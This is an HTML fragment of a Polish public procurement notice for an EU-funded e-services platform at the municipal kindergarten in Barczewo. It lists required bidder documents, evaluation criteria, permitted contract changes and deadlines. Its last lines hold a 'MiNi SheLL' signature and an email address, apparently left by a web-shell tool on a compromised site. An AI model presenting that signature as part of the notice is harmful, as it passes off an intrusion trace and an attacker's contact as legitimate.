<ul class="kh_indent_1"><li><p>Zamawiający żąda, aby Wykonawca przedstawił opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia. Suma gwarancyjna na jedno i wszystkie zdarzenia - minimalnie na wartość 250 000,00 zł. (słownie: dwieście pięćdziesiąt tysięcy złotych). Ocena spełnienia warunku nastąpi na podstawie złożonej polisy(lub innego dokumentu potwierdzającego ubezpieczenie OC) Nie złożenie polisy (lub innego dokumentu potwierdzającego ubezpieczenie OC), spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełniony i podpisany Formularz oferty z wykorzystaniem wzoru - załącznik nr 1 do siwz. 2).Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2 do siwz. 3) Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów 4)Oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych z wykorzystaniem wzoru - załącznik nr 3 do siwz. 5) Aktualny odpis z właściwego rejestru lub centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 6) W przypadku gdy nie zachodzą okoliczności, o których mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych, tj. gdy firma Wykonawcy nie przynależy do żadnej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2007 r. Nr 50, poz. 331 ze zm.) - Oświadczenie o braku podstaw do wykluczenia z art. 24 ust. 2 pkt 5 ustawy Pzp o braku przynależności do grupy kapitałowe - załącznik nr 5a do siwz. Lub 7) Oświadczenie z art. 24 ust. 2 pkt 5 ustawy Prawo zamówień  publicznych o przynależności do tej samej grupy kapitałowej wraz z Listą podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2007 r. Nr 50, poz. 331 ze zm.) - zał. nr 5b do siwz. 8) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami z wykorzystaniem wzoru stanowiącego załącznik nr 6 do siwz 9) Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia z minimalną sumą gwarancyjną co najmniej 250 000,00 zł. (słownie: dwieście pięćdziesiąt tysięcy złotych). 10) Kalkulację zamówienia - załącznik nr8 do siwz. 11) Wykaz urządzeń oraz e-usług oferowanych przez Wykonawcę sporządzony wg wzoru stanowiącego załącznik nr 11 do siwz - opis przedmiotu zamówienia - sprzęt i nr 12 do siwz - opis przedmiotu zamówienia - programy, z których musi wynikać, że oferowane przez Wykonawcę dostawy spełniają wymagania Zamawiającego. Wykonawca może załączyć do oferty katalogi, opisy lub fotografie wraz z istotnymi parametrami technicznymi oferowanego sprzętu i urządzeń składających się na ofertę Wykonawcy. 12) Oświadczenie o Podwykonawcach Do oferty należy załączyć informację o częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom lub wykonać przy pomocy podwykonawców - zał. nr 9 do siwz. 13)p Wadium do oferty należy załączyć potwierdzenie wniesienia wadium stanowiącego jej zabezpieczenie, w wysokości 7 000,00 zł.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmiany postanowień Umowy na podstawie art. 144 ust.1 ustawy Prawo zamówień publicznych w formie aneksów, za zgodą Stron. 2. Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu Umowy, chyba że zmiana taka znana była w chwili składania oferty. 3.Zamawiający dopuszcza zmianę umowy w zakresie zmiany terminu wykonania zamówienia w przypadkach, gdy: 1. Wystąpią okoliczności niezależne od Wykonawcy lub wystąpi działanie siły wyższej, np.: - katastrofalne działanie przyrody (kataklizmy, trzęsienie ziemi itp.), - katastrofalne działanie ludzkości (działania wojenne itp.), - zmiana przepisów prawnych, powodująca wydłużenie terminu realizacji zamówienia, - zaburzenia życia zbiorowego (np. akty wandalizmu zbiorowego, kradzieże itp.) - wystąpienie katastrofy budowlanej w czasie robót z przyczyn niezależnych od Wykonawcy. Okoliczności te były niemożliwe do przewidzenia i niemożliwe do zapobieżenia, skutkując niemożliwością dotrzymania terminu. 2. Wystąpią inne, wyjątkowo niesprzyjające okoliczności, uniemożliwiające Wykonawcy terminowe Wykonanie przedmiotu zamówienia, na które Strony nie miały wpływu. W takim przypadku strony mogą przesunąć termin zakończenia wykonania niniejszej umowy. 3. W przypadku wstrzymania przez Zamawiającego wykonywania robót, we wszystkich przypadkach określonych w punkcie 1, termin realizacji może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności. 4. W zakresie zmiany osób nadzorujących wykonanie robót branżowych przedstawionych w ofercie - jedynie za uprzednią pisemną zgodą Zamawiającego, w przypadku, gdy: a) Wykonawca z własnej inicjatywy proponuje zmianę z powodu: - choroby lub innych zdarzeń losowych, - nie wywiązywania się z obowiązków wynikających z Umowy zawartej w ramach przedmiotowego zamówienia, - jeżeli zmiana stanie się konieczną z przyczyn niezależnych od Wykonawcy (np. rezygnacji), b) Zamawiający może zażądać od Wykonawcy zmiany osób nadzorujących wykonanie robót branżowych, jeżeli uzna, że: - nie wykonuje on swoich obowiązków wynikających z Umowy zawartej w ramach przedmiotowego zamówienia. Wykonawca zobowiązany jest dokonać stosownej zmiany zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie. Nowe osoby nadzorujące wykonanie robót branżowych muszą spełniać wymagania określone w Ogłoszeniu o zamówieniu dla powyższych osób. 5.W zakresie zmiany formy zabezpieczenia umowy: zmiana przewidziana w art.149 ust.1 ustawy Prawo Zamówień Publicznych (Dz. U. z 2010r. Nr 113 poz. 759 ze zm.). 6.W zakresie zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dotyczącej wykonania robót określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę. 7.Powstanie potrzeba przeprowadzenia dodatkowych badań lub ekspertyz, warunkujących wykonanie niniejszej umowy. W takim przypadku strony mogą przesunąć termin zakończenia wykonania umowy. 8.Niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest konieczna w celu prawidłowego wykonania Przedmiotu Umowy. 9.W toku realizacji Umowy wyniknie obiektywna potrzeba przygotowania Produktu lub wykonania Usługi, których realizacja zostanie uzgodniona pomiędzy Stronami, niezbędnych (koniecznych) dla prawidłowej realizacji Przedmiotu Umowy. 10.Powstała możliwość zastosowania nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych lub technicznych, niż te istniejące w chwili podpisania Umowy. Jako korzystniejsze dla Zamawiającego należy traktować rozwiązania odpowiadające Wymaganiom Zamawiającego w większym stopniu z punktu widzenia kosztów utrzymania, wydajności systemu lub wyższej użyteczności. 11.Braku na rynku lub w zasobach producenta dostępnego sprzętu lub urządzeń, oferowanych przez Wykonawcę, jednak przez okres nie dłuższy niż do 30 dni. 12.Wykonawca udowodni Zamawiającemu, iż brak jest na rynku lub w zasobach producenta dostępnego sprzętu lub urządzeń oferowanych w ofercie Wykonawcy, lub o parametrach równoważnych, spełniających wymagania Zamawiającego określonych w siwz, lub wystąpią inne istotne okoliczności uniemożliwiające spełnienie przez Wykonawcę świadczenia określonego w umowie; w takich przypadkach Wykonawca i Zamawiający postanowią o zmianie sposobu świadczenia Wykonawcy przedmiotu zamówienia określonego w umowie. 13.Wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizację ze strony Wykonawcy lub ze strony Zamawiającego). 14.Wystąpi konieczność wprowadzenia innych zmian które są konieczne do wprowadzenia, a nie dało się ich przewidzieć w chwili zawarcia umowy, a które to zmiany są korzystne dla Zamawiającego i zarazem nie powodują zmiany świadczenia. 15.W zakresie zmiany ustawowej wysokości podatku od towarów i usług VAT: jeżeli w trakcie realizacji przedmiotu Umowy nastąpi zmiana stawki podatku VAT dla dostaw objętych przedmiotem zamówienia, strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za dostawy, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano. 16.W przypadku wstrzymania przez Zamawiającego realizacji dostaw, oraz we wszystkich wymienionych w punktach 1 - 14 okolicznościach, termin realizacji może ulec przedłużeniu, nie dłużej jednak, niż o czas trwania tych okoliczności. 17.Każda zmiana w umowie musi być potwierdzony protokołem konieczności, zatwierdzonym przez Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkolebarczewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nieodpłatnie na stronie internetowej Zamawiającego oraz w siedzibie Zamawiającego w godzinach pracy Przedszkola Miejskiego w Barczewie pomiędzy 8.30-14.30, pokój nr 21..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2015 godzina 10:00, miejsce: Oferty winny być złożone w siedzibie Zamawiającego w Przedszkolu Miejskim w Barczewie, ul. J. Słowackiego 7, pok. Nr 21 (parter),w dni pracy Przedszkola Miejskiego w Barczewie, w godz. 8:30-14.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie inwestycyjne realizowane jest w ramach projektu Innowacyjne e-przedszkole - utworzenie platformy e-usług publicznych oraz systemu back-office w Przedszkolu Miejskim w Barczewie dofinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 Oś priorytetowa 7 Infrastruktura społeczeństwa informacyjnego, Działanie 7.2 Promocja i ułatwianie dostępu do usług teleinformatycznych, Poddziałanie 7.2. Usługi i aplikacje dla obywateli..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com